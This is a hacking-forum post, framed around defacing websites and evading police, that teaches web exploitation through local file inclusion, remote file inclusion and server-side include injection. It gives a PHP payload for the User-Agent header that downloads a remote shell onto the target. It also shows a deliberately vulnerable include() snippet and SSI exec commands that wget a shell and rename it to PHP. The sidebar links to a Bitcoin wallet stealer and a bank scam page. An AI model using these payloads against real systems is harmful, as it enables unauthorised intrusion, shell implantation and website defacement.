www.i4info.org

i4info Provides the best hacking Material. Latest hacking tutorials and tools are available here. It is the best place for hackers.

Latest topics

» BitCoin Wallet stealor New
Yesterday at 7:46 pm by Admin

» Muhammad Shahroze Rashid | Marketing Consultant
Yesterday at 1:48 pm by Admin

» Muhammad Shahroze Rashid | Sharp Mind, Sharp Innovations
Yesterday at 1:47 pm by Admin

» How to design an effective job ad
Yesterday at 1:45 pm by Admin

» Teen Patti Gold Hack & 3 Patti Chips Code Extra Bonus 2016
Tue Dec 06, 2016 4:38 am by shoytan er lara

» Content Marketing | Promotional Video
Fri Dec 02, 2016 2:45 pm by Admin

» How to start an Online Business | Complete Guide
Fri Dec 02, 2016 2:30 pm by Admin

» Zeeshan Bhatti
Wed Nov 30, 2016 3:18 pm by Admin

» USAA letter for scam page
Tue Nov 29, 2016 4:20 am by Hardyjsh1966

December 2016

MonTueWedThuFriSatSun
   1234
567891011
12131415161718
19202122232425
262728293031 

Calendar Calendar

Affiliates


free forum

Forumotion on Facebook Forumotion on Twitter Forumotion on YouTubeForumotion on Google+

Visitors Counter


Flag Counter

About Author

Muhammad Shahroze Rashid
i4info
Web Developer
Web Developer & Designer,Researcher and Technical writer. An Information Security Consultant and System Auditor, a keen Security researcher.
samanabad
lahore, Punjab
54000
Pakistan
[email protected]
03064904829
DOB: 05/25/1992
Muhammad Shahroze Rashid
Muhammad Shahroze Rashid is a Web Developer and Designer, Android Developer, InfoGrapher, IT consultant and Researcher
Reviewed by Google
Google
Date published: 01/19/2016
9 / 10 stars
Muhammad Shahroze Rashid
Muhammad Shahroze Rashid Web Developer & Designer,Researcher and Technical writer. An Information Security Consultant and System Audito
samanabad
lahore
Punjab
54000
Pakistan

Tutorial Advanced Exploitation Techniques

Share

Admin
Admin

Posts : 455
Reputation : 5
Join date : 2014-12-10
Age : 24
Location : Pakistan

Tutorial Advanced Exploitation Techniques

Post by Admin on Thu Dec 25, 2014 3:46 pm

Table of Contents
Chapter I: Recon
Chapter II: Getting the tools ready
Chapter III: Getting your ass safe
Chapter IV: Local File Inclusion
Chapter V: Remote File Inclusion
Chapter VI: Server Side Inclusion
Chapter VII: Last word


Chapter I: Recon

Allright imagine this: "You are a NAVY seal, ready to strike Osama binladens House. But.... you havent prepared any strategy, plan, you havent found any flaw in the house its security. I bet you could tell me whats going to happen with the mission. COMPLETE FAILURE.
Always plan, plan and dont forget... Plan. Let me explain you briefly what i mean with planning. The art of planning is basicly gathering information about your target. The information i always collect is: The OS, The CMS it is running, Are there any open ports?. Then after i have gathered that information i usually perform a paros Proxy scan on the site. Basicly all it does is, scan the site for vulnerabilities and make up an fancy report.
If you want to download and use Paros for yourself be my guest.
Allright now.. I assume that you have the following information:
Any idea which ports are open on the target, The Operating System, The possible CMS the server is running (not necessary) and Your Paros Proxy report. Thats basicly all the information you need to determine which kind of attack you are going to use against the target.

Chapter II: Tools

Like every job there is, you will need tools.
We hackers have a very small ammount of tools necessarry to complete our main goal. Which is exploiting that one website you wish to deface.
Allright troughout this tutorial we are not going to use fancy tools etc.
Instead we will be using these key tools: -Your brain, -Your hands and last but certainly not least.... Firefox.
Make sure that you have either http headers or tamperdata installed as a firefox plugin.


Chapter III: Safey

In a world, where people hack targets you have another group of people. I bet you feel this comming.... The police.
Trust me on this one, once you start hacking big sites. The police will try to get your ass. But not when we are around. We can outsmart the police by using a VPN. VPN stands for Virtual Private Network. Basicly its a server you can connect to, which will intercept all your packets and make them go trough their server. All that it does is hide your real IP.
Some free VPN's are: Cyberghost, VPNreactor and nProx.
Once you move on to the bigger sites, i would highly recommend to get a paid VPN like vpntunnel or anonine.


Chapter IV: Local File Inclusion

Most of you have probally heard about this method once or twice. This is the so called "LFI" exploitation method.
LFI can occur on sites with this extension:

Code:

[You must be registered and logged in to see this link.]


When you perform an LFI attack you attempt to bypass the server directories to end up into the proc/self/environ directory. This can be done with ../../../proc/self/environ or if the ../. Useless you say? WELL i couldnt disagree more with you on that one. You see on the first sight proc/self/environ seems like a bunch of shit.
It will look something like this:

Code:

TMPDIR=/var/chroot/home/content/23/8340423/tmpPHPRC=/var/chroot/home/content/23/8340423/htmlTEMP=/var/chroot/home/content/23/8340423/tmpPHP_FCGI_CHILDREN=0PATH=/usr/local/bin:/usr/bin:/binPWD=/web/cgi-binSHLVL=0RAILS_ENV=productionSPI=TRUETMP=/var/chroot/home/content/23/8340423/tmpPHP_FCGI_MAX_REQUESTS=100000


But there is something really cool we can do with this.
We can spawn a shell trough this directory...
Now i got your attention right? Good. To spawn a shell we simply open up our tamper data en reload the page while we are tampering.
Once you see a little message pop up, click tamper data.
Now we will notice a little Useragent tab.
In there we will type the following code:

PHP Code:


<?php $file = fopen("shellname.php","w+"); $stream = fopen ("Link you shell here/shell.txt", "r"); while(!feof($stream)) {
$shell .=fgets($stream); } fwrite($file, $shell); fclose($file);?>



Thanks to Legit for that code. Works beter then mine with system();
Now once you have done that, click the submit button and your shell should be spawned Smile. To check if it worked go to This link is hidden from you. If you want to see it you have to [You must be registered and logged in to see this link.] on this board. and voila.


Chapter V: Remote File Inclusion

Im not very glad to say, but this is one of the good exploit methods that has died. There are almost no websites who have this vulnerability. Thats because its so easy to fix and yet so harmfull.
I will explain you the so called "RFI" briefly.
RFI or remote file inclusion is an technique where you exploit the include(); function.
RFI and LFI are quite similair, there's a catch tho. "Remote" refers to using an external site to upload your shell and "Local" refers to uploading your shell using the same site.
For an example: a site includes php scripts in an un-protected manner.
A little bit like this:

PHP Code:


<?php
$color = 'blue';
if (isset( $_GET['COLOR'] ) )
$color = $_GET['COLOR'];
include( $color . '.php' );
?>



Now to exploit this we will execute the following command:

Code:

[You must be registered and logged in to see this link.]


Now you are wondering.. why the hell did he use a .txt shell?
PHP automaticly transfers .txt > .php. which will result in a nice shell to own/deface the website.

Chapter VI: Server Side Inclusion

Okay now we move on to the "harder" methods.
Server Side Inclusion or SSI is an advanced technique that exploits vulnerabilities in the HTML code.
All that this means is that you inject script into html-forms and that it will result in spawning a shell or doing something worse.
SSI can only be performed in a few pages. Only pages with .shtml and .shtm are affected by this. These pages are 100% injectable. There is a something else to keep in mind. SSI will also work in normal pages, but ONLY when the input is not filtered.
For an example we have a little textbox which is vulnerable to SSI.
We can do some nice little commands here for an example:

Code:

< !--#exec cmd="cd \admin\dir">
< !--#exec cmd="wget [You must be registered and logged in to see this link.] -->


i will explain these 2 commands to you for a moment.
The first command lets you browse directories that you cant acces without administrator priveleges. The second command lets you download your shell on the website (This is the shit we are interested in).
Then the only thing left for you to do is to locate your file by executing this command:

Code:

< !--#exec cmd="cp folderlocation/shellname.txt folderlocation/yourshellname.php" -->
This basicly finds your shell.txt, converts it to PHP and places it in the directory of your choice.


Chapter VII: Last things

Well this was my little tutorial regarding uncommon forms of attack.
I hope you have learned something from it and i hope to hear your personal experiences with this.
If this helped you, please leave any form of thank you. Its highly apreciated Smile



    Current date/time is Thu Dec 08, 2016 10:45 am